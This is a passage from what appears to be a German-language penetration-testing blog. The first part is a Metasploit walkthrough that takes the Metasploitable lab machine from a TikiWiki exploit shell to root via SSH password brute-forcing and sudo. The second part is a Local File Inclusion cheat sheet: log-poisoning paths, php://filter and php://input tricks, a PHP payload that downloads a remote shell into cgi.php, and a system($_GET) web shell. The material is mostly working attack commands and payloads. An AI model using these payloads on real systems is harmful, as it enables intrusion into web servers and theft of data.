host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki  : tikiwiki195

[*] Attempting to execute our payload...
[*] Command shell session 2 opened ( -> at Wed Mar 16 09:02:39 -0400 2011

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Der gewählte Exploit gibt uns zusätzlich auch gleich den MySQL DB Login. Vielleicht können wir den später ja noch gebrauchen.

Wir können uns nun auf dem System ein wenig umsehen.

cat /etc/passwd

cat /etc/group

Wir sehen, dass der User msfadmin verschiedene Gruppenrechte hat und eventuell auch über sudo-Rechte verfügt. Deshalb versuchen wir, den msfadmin-Account mit msf zu bruten.

Ctrl + C, und verwendet dann den ssh login scanner, um das Passwort für msfadmin zu bruten.

msf > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) >set pass_file /tmp/passwords.txt
msf auxiliary(ssh_login) >set username msfadmin
msf auxiliary(ssh_login) >set RHOSTS
msf auxiliary(ssh_login) >exploit

Der Bruter hat für den User msfadmin das Passwort msfadmin gefunden. Damit können wir uns nun über SSH als msfadmin verbinden.

root@bt:/pentest/exploits/framework3# ssh msfadmin@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': no
Host key verification failed.
root@bt:/pentest/exploits/framework3# ssh msfadmin@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
msfadmin@'s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
No mail.
Last login: Sat Mar 19 12:56:05 2011 from
msfadmin@metasploitable:~$ sudo -i
[sudo] password for msfadmin:
root@metasploitable:~# whoami
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)


LFI – Local File Inclusion

Posted in PHP Injection on Januar 12, 2012 by peak

Dont forget the Nullbyte

/proc/self/environ -> UserAgent (Use with UserAgentSwitcher)
/proc/version (OS Info)
/proc/self/cmdline   (Info gathering)
/proc/self/fd/0      (Info gathering, hexadecimal countable)

 Config File Include
look for:
Apache Access Log      e.g. /var/log/apache2/access.log
Apache Error Log       e.g. /var/log/apache2/error.log
Apache Config          e.g. /etc/apache2/apache2.conf
telnet http://www.target.net 80

override the exif data and include the jpeg file!

send mail
to apache@vic.net -> /var/spool/mail/apache or /var/log/maillog
(Check the installed mail server's configuration for that path)

SSH Log Files
sqli in username -> /var/log/authlog (you can also check the local config file beside www, e.g. /etc/ssh/sshd_config)

or FTP?
try to login with sql commands and include /var/log/proftpd/proftpd.log




Read PHP Source
vuln.php?page=php://filter/convert.base64-encode/resource=FileNameToRead (allow_url_include, sprich RFI geht auch)

vuln.php?page=php://input Post: *PHPCode* (also works with Restricted by allow_url_include)

… und was injecten?
<?php $z=fopen('cgi.php','w');fwrite($z,file_get_contents('http://url/to/your/shell.txt'));fclose($z); ?>
<?php system($_GET['x']); ?>